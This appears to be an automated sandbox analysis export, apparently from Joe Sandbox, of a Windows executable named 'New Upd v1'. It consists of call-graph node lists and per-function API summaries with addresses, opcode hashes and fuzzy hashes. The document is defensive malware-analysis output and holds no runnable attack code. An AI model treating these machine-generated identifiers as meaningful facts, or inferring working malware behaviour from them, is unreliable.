8810 80f164 InterlockedIncrement 8803->8810 8805 80f2b1 8805->8809 8822 80f1ea 8805->8822 8809->8799 8811 80f182 8810->8811 8812 80f17f InterlockedIncrement 8810->8812 8813 80f18c InterlockedIncrement 8811->8813 8814 80f18f 8811->8814 8812->8811 8813->8814 8815 80f199 InterlockedIncrement 8814->8815 8816 80f19c 8814->8816 8815->8816 8817 80f1a6 InterlockedIncrement 8816->8817 8818 80f1a9 8816->8818 8817->8818 8819 80f1be InterlockedIncrement 8818->8819 8820 80f1ce InterlockedIncrement 8818->8820 8821 80f1d7 InterlockedIncrement 8818->8821 8819->8818 8820->8818 8821->8805 8823 80f272 8822->8823 8824 80f1f3 InterlockedDecrement 8822->8824 8823->8809 8836 80f024 8823->8836 8825 80f209 InterlockedDecrement 8824->8825 8826 80f20c 8824->8826 8825->8826 8827 80f216 InterlockedDecrement 8826->8827 8828 80f219 8826->8828 8827->8828 8829 80f223 InterlockedDecrement 8828->8829 8830 80f226 8828->8830 8829->8830 8831 80f230 InterlockedDecrement 8830->8831 8833 80f233 8830->8833 8831->8833 8832 80f248 InterlockedDecrement 8832->8833 8833->8832 8834 80f258 InterlockedDecrement 8833->8834 8835 80f261 InterlockedDecrement 8833->8835 8834->8833 8835->8823 8837 80f038 8836->8837 8840 80f08f ___free_lc_time 8836->8840 8838 80f061 ___free_lconv_mon 8837->8838 8839 80f06e 8837->8839 8837->8840 8838->8839 8839->8840 8841 80f082 ___free_lconv_num 8839->8841 8840->8809 8841->8840 8539 7f5040 8540 7f5052 8539->8540 8541 80d361 _memcpy_s _memset 8540->8541 8542 7f506f 8541->8542 8958 7f12c0 8959 7f131b 8958->8959 8962 7f12f6 8958->8962 8960 7f13e7 _memset GetEnvironmentVariableA 8959->8960 8959->8962 8960->8962 8961 80b245 __crtGetLocaleInfoA_stat 5 API calls 8963 7f1526 8961->8963 8962->8961 9185 7f93c0 9186 7f93e7 9185->9186 9187 7f941c SetTimer 9186->9187 9188 7f9403 GetTickCount 9186->9188 9190 7f93f3 9186->9190 9189 7f942f IsWindow 9187->9189 9188->9187 9189->9190 9191 7f943d PeekMessageA 9189->9191 9192 7f9455 9191->9192 9193 7f9473 Sleep 9191->9193 9192->9189 9192->9190 9194 7f945d TranslateMessage DispatchMessageA 9192->9194 9193->9192 9194->9192 8871 80d147 8872 812069 FindHandler __amsg_exit 8871->8872 8873 80d14d 8872->8873 8874 812069 FindHandler __amsg_exit 8873->8874 8875 80d158 8874->8875 8543 81a4ca 8544 81a4da 8543->8544 8545 81a4de 8543->8545 8546 81a4f5 8545->8546 8548 81a53d 8545->8548 8549 81a4ec ___wtomb_environ 8545->8549 8547 81a507 _strlen 8546->8547 8546->8548 8551 81a51d 8547->8551 8549->8546 8549->8548 8550 81a512 _strlen 8550->8551 8551->8548 8551->8550 8552 8164ca 8553 812624 8552->8553 8554 8164d6 __lock 8553->8554 8557 8162cd 8554->8557 8556 8164ea 8558 8162e0 8557->8558 8559 8162f2 8558->8559 8560 8162e5 __invoke_watson 8558->8560 8561 8162f7 8559->8561 8562 8163dd 8559->8562 8564 816325 8559->8564 8560->8559 8561->8556 8563 8160d8 _cvtdate __invoke_watson 8562->8563 8565 8163f1 8563->8565 8570 8160d8 8564->8570 8566 8160d8 _cvtdate __invoke_watson 8565->8566 8566->8561 8569 8160d8 _cvtdate __invoke_watson 8569->8561 8571 8160f6 8570->8571 8572 816249 8571->8572 8573 816277 __invoke_watson 8571->8573 8572->8569 8573->8572 8964 7f32b0 GetModuleHandleA 8965 7f3313 8964->8965 8966 7f3320 _memset 8965->8966 8967 7f3359 8966->8967 8968 7f3380 _strlen 8967->8968 8970 7f33ac 8967->8970 8968->8970 8969 7f36de 8970->8969 8971 7f3695 _strlen 8970->8971 8972 7f36cb MessageBoxA 8971->8972 8973 7f36a2 8971->8973 8972->8969 8973->8972 8974 80d258 8977 80d177 8974->8977 8976 80d265 8978 80d18c _strlen _malloc 8977->8978 8979 80d1a4 _strcpy_s 8977->8979 8978->8979 8979->8976 8574 81e0d8 8577 81e01e _LocaleUpdate::_LocaleUpdate 8574->8577 8576 81e0e7 8578 81e039 8577->8578 8578->8576 9195 81835b 9196 8183a5 9195->9196 9197 81837a GetStringTypeW 9195->9197 9198 818392 9196->9198 9200 81848c ___ansicp 9196->9200 9197->9198 9199 81839a GetLastError 9197->9199 9202 8184b6 9198->9202 9203 8183de MultiByteToWideChar 9198->9203 9199->9196 9200->9202 9205 8184ba 9200->9205 9208 80b245 __crtGetLocaleInfoA_stat 5 API calls 9202->9208 9203->9202 9204 81840b 9203->9204 9212 818433 _malloc 9204->9212 9215 818420 9204->9215 9206 8184dd GetStringTypeA 9205->9206 9207 8184bf ___convertcp 9205->9207 9206->9202 9207->9202 9210 8184da 9207->9210 9209 818511 9208->9209 9210->9206 9211 81844d _memset MultiByteToWideChar 9213 818480 __freea 9211->9213 9214 81846f GetStringTypeW 9211->9214 9212->9215 9213->9202 9214->9213 9215->9202 9215->9211 8876 80e15b 8877 80e172 strtoxq 8876->8877 8948 80e2dd GetSystemTimeAsFileTime __aulldiv 8949 80e312 8948->8949 9216 81235f 9217 812069 FindHandler __amsg_exit 9216->9217 9218 812326 9217->9218 9219 812069 FindHandler __amsg_exit 9218->9219 9220 812337 _abort 9219->9220 9222 81235e 9220->9222 9227 813362 _LocaleUpdate::_LocaleUpdate 9228 8133c2 9227->9228 9233 8133ef 9227->9233 9229 80b245 __crtGetLocaleInfoA_stat 5 API calls 9228->9229 9230 813cce 9229->9230 9231 8136a4 __isleadbyte_l 9231->9233 9232 8132c1 __getbuf __locking __lseeki64 __locking _write_multi_char 9232->9233 9233->9228 9233->9231 9233->9232 9234 813850 _strlen 9233->9234 9235 8137d7 _wctomb_s 9233->9235 9236 813318 __getbuf __locking __lseeki64 __locking _write_string 9233->9236 9237 813928 __malloc_crt 9233->9237 9238 813bfc _wctomb_s 9233->9238 9240 8132f4 __getbuf __locking __lseeki64 __locking _write_multi_char 9233->9240 9241 815020 9233->9241 9234->9233 9235->9233 9236->9233 9237->9233 9238->9233 9240->9233 9242 815046 __output_l 9241->9242 9243 8154ab MapViewOfFile 9242->9243 9244 8154c1 __alldvrm __output_l 9243->9244 9146 8103e5 9147 810404 LCMapStringW 9146->9147 9149 81041f 9146->9149 9148 810427 GetLastError 9147->9148 9147->9149 9148->9149 9150 81061c ___ansicp 9149->9150 9151 810479 9149->9151 9153 810654 9150->9153 9164 81064d 9150->9164 9154 810492 MultiByteToWideChar 9151->9154 9151->9164 9157 810738 LCMapStringA 9153->9157 9158 81065d ___convertcp 9153->9158 9155 8104bf 9154->9155 9154->9164 9162 8104eb _malloc 9155->9162 9165 8104d8 9155->9165 9156 80b245 __crtGetLocaleInfoA_stat 5 API calls 9159 810785 9156->9159 9157->9164 9160 810679 LCMapStringA 9158->9160 9158->9164 9161 81069b 9160->9161 9160->9164 9169 8106c2 _malloc 9161->9169 9173 8106ac 9161->9173 9162->9165 9163 810510 MultiByteToWideChar 9166 810529 LCMapStringW 9163->9166 9167 81060b __freea 9163->9167 9164->9156 9165->9163 9165->9164 9166->9167 9168 81054a 9166->9168 9167->9164 9171 810552 9168->9171 9172 81057b 9168->9172 9169->9173 9170 8106e0 _memset LCMapStringA 9174 810706 9170->9174 9175 81070a ___convertcp 9170->9175 9171->9167 9177 810564 LCMapStringW 9171->9177 9179 8105ac _malloc 9172->9179 9182 810596 9172->9182 9173->9164 9173->9170 9176 81072f __freea 9174->9176 9175->9176 9176->9164 9177->9167 9178 8105ca LCMapStringW 9180 8105e2 WideCharToMultiByte 9178->9180 9181 810604 __freea 9178->9181 9179->9182 9180->9181 9181->9167 9182->9167 9182->9178 8579 80a0e6 8580 80a0f0 _setlocale 8579->8580 8581 80a108 8579->8581 8580->8581 8583 7fa418 8584 7fa3da 8583->8584 8585 7fa41a 8584->8585 8586 7fa3f0 WaitForInputIdle 8584->8586 8588 7fa437 WaitForInputIdle Sleep 8585->8588 8602 7fa430 8585->8602 8586->8584 8587 7fa40b Sleep 8586->8587 8587->8585 8589 7fa6b0 8588->8589 8590 7fa45b GetTickCount 8589->8590 8593 7fa474 8590->8593 8591 80b245 __crtGetLocaleInfoA_stat 5 API calls 8592 7fa6a5 8591->8592 8594 7fa541 _memset GetModuleHandleA 8593->8594 8595 7fa574 8594->8595 8596 7fa598 GetModuleHandleA 8595->8596 8597 7fa5d7 8596->8597 8598 7fa5ef SetTimer 8597->8598 8599 7fa609 8598->8599 8600 7fa61f GetMessageA 8599->8600 8599->8602 8601 7fa636 TranslateMessage DispatchMessageA 8600->8601 8600->8602 8601->8599 8602->8591 8603 7ec010 CreateThread CloseHandle 8604 7ec067 8603->8604 8605 7ec040 IsWindow 8603->8605 8608 7ec070 8603->8608 8606 7ec05b Sleep 8605->8606 8607 7ec051 Sleep 8605->8607 8606->8604 8607->8605 8609 7ec500 8608->8609 8610 7ec09a GetTickCount 8609->8610 8619 7ec0a8 8610->8619 8611 7ec39e 8612 7ec0b5 PeekMessageA 8613 7ec0d0 TranslateMessage DispatchMessageA 8612->8613 8612->8619 8613->8619 8614 7ec0fe GetTickCount 8615 7ec391 Sleep 8614->8615 8616 7ec115 GetTickCount 8614->8616 8615->8619 8617 7ec139 IsWindow 8616->8617 8618 7ec127 EnumWindows 8616->8618 8617->8619 8618->8619 8631 7ec400 GetWindowThreadProcessId 8618->8631 8619->8611 8619->8612 8619->8614 8619->8615 8620 7ec19c IsWindowUnicode 8619->8620 8621 7ec2f3 _strlen GlobalAlloc GlobalLock 8619->8621 8622 7ec1bb GlobalAlloc GlobalLock 8619->8622 8624 7ec32d GlobalUnlock PackDDElParam PostMessageA 8619->8624 8625 7ec1e6 _wcscpy GlobalUnlock PackDDElParam PostMessageW 8619->8625 8626 7ec252 _strlen GlobalAlloc GlobalLock 8619->8626 8627 7ec28c GlobalUnlock PackDDElParam PostMessageA 8619->8627 8628 7ec3c0 IsBadReadPtr 8619->8628 8620->8619 8621->8619 8622->8619 8624->8619 8625->8619 8626->8619 8627->8619 8629 7ec3da WideCharToMultiByte 8628->8629 8630 7ec3d3 8628->8630 8629->8630 8632 7ec4e6 8631->8632 8633 7ec423 8631->8633 8633->8632 8634 7ec43e GlobalAddAtomW GlobalAddAtomW SendMessageW 8633->8634 8635 7ec493 GlobalAddAtomA GlobalAddAtomA SendMessageA 8633->8635 8634->8632 8635->8632 8636 7f3010 8637 7f302e SetWindowTextA GetDlgItem SetWindowTextA 8636->8637 8638 7f302c 8636->8638 8637->8638 8842 7f5110 ctype 8843 7f517f 8842->8843 9245 7fa390 GetCurrentThread SetThreadPriority 9246 7fa3da 9245->9246 9247 7fa41a 9246->9247 9248 7fa3f0 WaitForInputIdle 9246->9248 9250 7fa437 WaitForInputIdle Sleep 9247->9250 9251 7fa430 9247->9251 9248->9246 9249 7fa40b Sleep 9248->9249 9249->9247 9252 7fa6b0 9250->9252 9254 80b245 __crtGetLocaleInfoA_stat 5 API calls 9251->9254 9253 7fa45b GetTickCount 9252->9253 9256 7fa474 9253->9256 9255 7fa6a5 9254->9255 9257 7fa541 _memset GetModuleHandleA 9256->9257 9258 7fa574 9257->9258 9259 7fa598 GetModuleHandleA 9258->9259 9260 7fa5d7 9259->9260 9261 7fa5ef SetTimer 9260->9261 9262 7fa609 9261->9262 9262->9251 9263 7fa61f GetMessageA 9262->9263 9263->9251 9264 7fa636 TranslateMessage DispatchMessageA 9263->9264 9264->9262 8844 81f1f0 _LocaleUpdate::_LocaleUpdate __crtLCMapStringW_stat 8845 81f227 8844->8845 8980 80d271 8981 80d1dd std::exception::exception 2 API calls 8980->8981 8982 80d27d 8981->8982 8983 80f276 8984 80f296 8983->8984 8985 80f27d 8983->8985 8985->8984 8986 80f164 ___addlocaleref 8 API calls 8985->8986 8986->8984 9269 819376 _LocaleUpdate::_LocaleUpdate 9272 819239 9269->9272 9273 81927c 9272->9273 9274 81925f GetLocaleInfoW 9272->9274 9276 819269 9273->9276 9277 819352 GetLocaleInfoA 9273->9277 9275 819271 GetLastError 9274->9275 9274->9276 9275->9273 9278 8192c3 9276->9278 9279 8192b0 GetLocaleInfoW 9276->9279 9277->9278 9280 80b245 __crtGetLocaleInfoA_stat 5 API calls 9278->9280 9279->9278 9282 8192ca 9279->9282 9281 819374 9280->9281 9284 8192f9 _malloc 9282->9284 9285 8192e3 9282->9285 9283 819317 GetLocaleInfoW 9286 819347 __freea 9283->9286 9287 819327 WideCharToMultiByte 9283->9287 9284->9285 9285->9278 9285->9283 9286->9278 9287->9286 8883 818178 8884 812069 FindHandler __amsg_exit 8883->8884 8885 818181 8884->8885 8888 8181b1 _TranslateName 8885->8888 8890 8181c1 8885->8890 8891 818193 GetUserDefaultLCID 8885->8891 8887 81820c 8892 818265 _ProcessCodePage 8887->8892 8893 81834f 8887->8893 8888->8890 8889 818215 8889->8891 8895 81821f _strlen EnumSystemLocalesA 8889->8895 8890->8889 8894 8181ce 8890->8894 8891->8887 8892->8893 8896 818284 8892->8896 8897 8181df 8894->8897 8898 8181d8 8894->8898 8895->8887 8896->8893 8902 81829c IsValidCodePage 8896->8902 8921 81813c _strlen 8897->8921 8916 8180d7 _strlen _strlen 8898->8916 8901 8181dd 8901->8892 8903 8181e9 _TranslateName 8901->8903 8902->8893 8904 8182ae IsValidLocale 8902->8904 8903->8887 8905 8181fd 8903->8905 8904->8893 8906 8182c1 8904->8906 8907 81820e 8905->8907 8908 818207 8905->8908 8906->8893 8911 8182f1 _strcpy_s 8906->8911 8912 818316 GetLocaleInfoA 8906->8912 8909 81813c _GetLcidFromLanguage 3 API calls 8907->8909 8910 8180d7 _GetLcidFromLangCountry 4 API calls 8908->8910 8909->8887 8910->8887 8913 818327 GetLocaleInfoA 8911->8913 8915 818305 __invoke_watson 8911->8915 8912->8893 8912->8913 8913->8893 8914 81833b __itoa_s 8913->8914 8914->8893 8915->8913 8917 818108 8916->8917 8918 81810d _GetPrimaryLen 8916->8918 8919 818114 EnumSystemLocalesA 8917->8919 8918->8919 8920 81812d 8919->8920 8920->8901 8922 818151 8921->8922 8923 818156 _GetPrimaryLen 8921->8923 8924 81815d EnumSystemLocalesA 8922->8924 8923->8924 8925 818173 8924->8925 8925->8901 9184 81d3fd CreateFileA 8639 7ff400 _memset _memset LoadLibraryA 8640 7ff482 8639->8640 8641 7ff46a GetProcAddress 8639->8641 8641->8640 8846 8191fe _LocaleUpdate::_LocaleUpdate 8849 8190c3 8846->8849 8850 819106 8849->8850 8851 8190e6 GetLocaleInfoW 8849->8851 8854 81911a GetLocaleInfoW 8850->8854 8855 81912d 8850->8855 8852 8190f3 8851->8852 8853 8190fb GetLastError 8851->8853 8852->8854 8853->8850 8856 81915f 8854->8856 8855->8856 8858 819149 GetLocaleInfoA 8855->8858 8857 80b245 __crtGetLocaleInfoA_stat 5 API calls 8856->8857 8860 8191fc 8857->8860 8858->8856 8859 819166 8858->8859 8861 819194 _malloc 8859->8861 8863 81917e 8859->8863 8861->8863 8862 8191b2 GetLocaleInfoA 8864 8191c0 MultiByteToWideChar 8862->8864 8865 8191e2 __freea 8862->8865 8863->8856 8863->8862 8864->8865 8865->8856 8926 7f1180 8929 7f11b6 _memcmp 8926->8929 8927 80b245 __crtGetLocaleInfoA_stat 5 API calls 8928 7f12b2 8927->8928 8929->8927

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • MapViewOfFile.KERNEL32(00000000,?,?,?,-00000003451C95D6,?,-D679B2CA,?,0080DE67,0080AA9E,00845E98,0000000C,008129AD,00000000,00846180,0000000C), ref: 008154B4
                                                                                • __alldvrm.LIBCMT ref: 008157E8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1957625489.00000000007C9000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1957515719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957662784.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957677148.000000000083B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957692663.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957709963.0000000000869000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_New Upd v1.jbxd
                                                                                Similarity
                                                                                • API ID: FileView__alldvrm
                                                                                • String ID:
                                                                                • API String ID: 343586851-0
                                                                                • Opcode ID: 77e415023229af667a03df6b99b5f08fca11095f6f668ee05fa0a8911a9114cc
                                                                                • Instruction ID: 616af4c99068281474078e735244090946d9df6f3529accec9538e128f025c0d
                                                                                • Opcode Fuzzy Hash: 77e415023229af667a03df6b99b5f08fca11095f6f668ee05fa0a8911a9114cc
                                                                                • Instruction Fuzzy Hash: B5F156A7A55729469798BABE8C4F26E1503EBC0304787DB2EE953CB68BDD39854700C3

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • MapViewOfFile.KERNEL32(00000000,?,?,?,-00000003451C95D6,?,-D679B2CA,?,0080DE67,0080AA9E,00845E98,0000000C,008129AD,00000000,00846180,0000000C), ref: 008154B4
                                                                                • __alldvrm.LIBCMT ref: 008157E8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1957625489.00000000007C9000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1957515719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957662784.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957677148.000000000083B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957692663.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957709963.0000000000869000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_New Upd v1.jbxd
                                                                                Similarity
                                                                                • API ID: FileView__alldvrm
                                                                                • String ID:
                                                                                • API String ID: 343586851-0
                                                                                • Opcode ID: 54a5273e1f5c1ae0f98143e17f87397be45db9ea67c262969ff0b5ec56a9ff60
                                                                                • Instruction ID: add019ab978935c3fc721443b1597cdfb79fc9eac9d758b59eacd0a2402a6d63
                                                                                • Opcode Fuzzy Hash: 54a5273e1f5c1ae0f98143e17f87397be45db9ea67c262969ff0b5ec56a9ff60
                                                                                • Instruction Fuzzy Hash: 63C16AA7A11725469798BABE9C4F26E0503EBC0314787DB2EE953DB68BCE3D854700C3

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • MapViewOfFile.KERNEL32(00000000,?,?,?,-00000003451C95D6,?,-D679B2CA,?,0080DE67,0080AA9E,00845E98,0000000C,008129AD,00000000,00846180,0000000C), ref: 008154B4
                                                                                • __alldvrm.LIBCMT ref: 008157E8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1957625489.00000000007C9000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1957515719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957662784.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957677148.000000000083B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957692663.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957709963.0000000000869000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_New Upd v1.jbxd
                                                                                Similarity
                                                                                • API ID: FileView__alldvrm
                                                                                • String ID:
                                                                                • API String ID: 343586851-0
                                                                                • Opcode ID: 64095076d116f429b95117a9449a55c2bd60d2bd6734c945c148c91b444f30ac
                                                                                • Instruction ID: 29662b03c1bdd92fbdd67ede21617af847a42f2ac4d7782440cec1d1fce8637d
                                                                                • Opcode Fuzzy Hash: 64095076d116f429b95117a9449a55c2bd60d2bd6734c945c148c91b444f30ac
                                                                                • Instruction Fuzzy Hash: EC717BA3E117654AE758B6BD9C4F2AE1542EBC0314B87CB2AE913DB64BDE39C54310C2

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 423 814d3a-81503b call 7eb000 call 8128f3 call 80cc3c call 804d6b call 7fb673 call 7f08b3 call 7de0af call 7e18c0 call 80923d call 7d75ee call 7fa6c0 call 803511 call 7d4e93 call 7ca857 call 7d6b31 call 80dec6 call 7e0c1f CreateFileMappingA call 7edd6a call 7d9774 call 7f1bd5 call 80dca7 call 7edd6a call 804546 call 808978 call 810c4e call 7f08b3 call 7db970 478 815046-815766 call 7cfcc6 call 7ea67f call 8016af call 81170f call 80d956 call 7e2ac0 call 7f4478 call 80c851 call 7eb770 call 7d7b79 call 7ef4d6 call 7cf8d1 call 7d9238 call 8141fa call 7f8780 call 7fc76d call 805117 call 7c92a3 call 7ea780 call 7f583b call 7dee60 call 801372 call 80792f call 7d6f31 call 7ce096 call 801fad call 7f1ebd call 7dbfc0 call 7e2460 call 81590a call 7cd935 call 7cc892 call 8016af call 7fb673 call 7de1b0 call 7ddd80 call 8065ac call 7e948f call 8016af call 804026 call 7fd9ca call 7d961b call 804802 call 7dde90 call 7f78c1 call 7d88ff call 7fd9ca call 808887 call 7e9590 call 7f12b5 MapViewOfFile call 7d3aac call 7d6a8b call 7f3fb6 call 7e87e0 call 819b12 call 7d7df4 call 7ea780 call 7d3be6 call 8093d7 call 7fec16 call 819dfc call 80b578 call 7dd1d0 call 7d413c call 804546 call 7dfe50 call 7f47cf call 7faacb call 7e9060 call 807a45 call 8018ed call 7f3981 call 7e7600 call 7cb86b call 7fb673 call 7d69ce call 812470 call 7e2f00 call 80c851 call 807b9d call 7ec3fa call 80c8fd 423->478 479 815041 call 7fd9ca 423->479 644 81576b-8157d9 call 7e8290 call 7f08b3 call 7eeda6 call 80293f call 7d59e7 call 7d5c08 478->644 479->478 657 8157db 644->657 658 8157fa-815806 644->658 659 8157e2-8157f7 call 81a350 657->659 660 8157dd-8157e0 657->660 661 815808-81580b 658->661 662 81580f-815814 658->662 659->658 660->658 660->659 661->662
                                                                                APIs
                                                                                • CreateFileMappingA.KERNEL32(-00000001928BD631,-90EDDC5F,-04816628,?,-D679B2CA), ref: 00814EE3
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1957625489.00000000007C9000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1957515719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957662784.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957677148.000000000083B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957692663.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957709963.0000000000869000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_New Upd v1.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFileMapping
                                                                                • String ID:
                                                                                • API String ID: 524692379-0
                                                                                • Opcode ID: bba3b4ba4193859ca897b99d4ae66c37582217ef22030655fb52ef607a8de40c
                                                                                • Instruction ID: 1cd86cbc4dd600a1f4cba5b2d8132b360de56d244602d0b79be037236c60ca6d
                                                                                • Opcode Fuzzy Hash: bba3b4ba4193859ca897b99d4ae66c37582217ef22030655fb52ef607a8de40c
                                                                                • Instruction Fuzzy Hash: 9DE1256796573846A69CBABE8C9F27E0503FBD03043D2A62DE983DB58BDD39844701C7

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 839 7f9170-7f918d 840 7f918f-7f9196 839->840 841 7f91be-7f91c5 839->841 842 7f919c-7f91a0 840->842 843 7f92b7-7f92c0 840->843 841->843 844 7f91cb-7f91d2 841->844 847 7f92ce-7f92d5 842->847 848 7f91a6-7f91aa 842->848 845 7f92c7-7f92c9 843->845 846 7f92c2 call 7f8850 843->846 844->843 849 7f91d8-7f91df 844->849 851 7f93ac-7f93b9 call 80b245 845->851 846->845 852 7f92ed-7f92f4 847->852 853 7f92d7-7f92e3 DeleteObject 847->853 854 7f91ac-7f91b3 848->854 855 7f91ea-7f922a BeginPaint CreateCompatibleDC SelectObject 848->855 856 7f9389-7f9395 DestroyWindow 849->856 857 7f91e5 849->857 860 7f930d-7f930f 852->860 861 7f92f6-7f9303 DeleteObject 852->861 853->852 858 7f91b9 854->858 859 7f9314-7f9318 854->859 864 7f922c-7f9245 SelectPalette RealizePalette 855->864 865 7f924b-7f9278 BitBlt 855->865 856->851 863 7f9397-7f93a7 call 800d20 857->863 858->863 869 7f931a-7f9321 859->869 870 7f9352-7f9356 859->870 860->851 861->860 863->851 864->865 866 7f928a-7f92b2 SelectObject DeleteDC EndPaint 865->866 867 7f927a-7f9284 SelectPalette 865->867 866->851 867->866 874 7f932c-7f9333 869->874 872 7f9358-7f9364 GetTickCount 870->872 873 7f9385-7f9387 870->873 872->873 877 7f9366-7f937f KillTimer SendMessageA 872->877 873->851 875 7f9335-7f9345 GetAsyncKeyState 874->875 876 7f9350 874->876 878 7f934e 875->878 879 7f9347-7f934c call 7f8850 875->879 876->873 877->873 878->874 879->876
                                                                                APIs
                                                                                • BeginPaint.USER32(?,?), ref: 007F91F2
                                                                                • CreateCompatibleDC.GDI32(?), ref: 007F91FF
                                                                                • SelectObject.GDI32(?,?), ref: 007F9213
                                                                                • SelectPalette.GDI32(?,?,00000000), ref: 007F9238
                                                                                • RealizePalette.GDI32(?), ref: 007F9245
                                                                                • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 007F926E
                                                                                • SelectPalette.GDI32(?,00000000,00000000), ref: 007F9284
                                                                                • SelectObject.GDI32(?,?), ref: 007F9292
                                                                                • DeleteDC.GDI32(?), ref: 007F929C
                                                                                • EndPaint.USER32(00000000,?), ref: 007F92AA
                                                                                • DeleteObject.GDI32(?), ref: 007F92DD
                                                                                • DeleteObject.GDI32(?), ref: 007F92FD
                                                                                • GetAsyncKeyState.USER32(00000100), ref: 007F9339
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1957625489.00000000007C9000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1957515719.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957662784.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957677148.000000000083B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957692663.0000000000849000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957709963.0000000000869000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1957786214.00000000009F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_New Upd v1.jbxd
                                                                                Similarity
                                                                                • API ID: ObjectSelect$DeletePalette$Paint$AsyncBeginCompatibleCreateRealizeState
                                                                                • String ID:
                                                                                • API String ID: 1547880632-0
                                                                                • Opcode ID: a3c5115e678ea162abfd707b6b8fda01a5bd49db733d15370f78b5bfd95c4a57
                                                                                • Instruction ID: 5d85dac975c7164e0e883e22043c77f11606add29f111bcbc34c558c5d8d3673
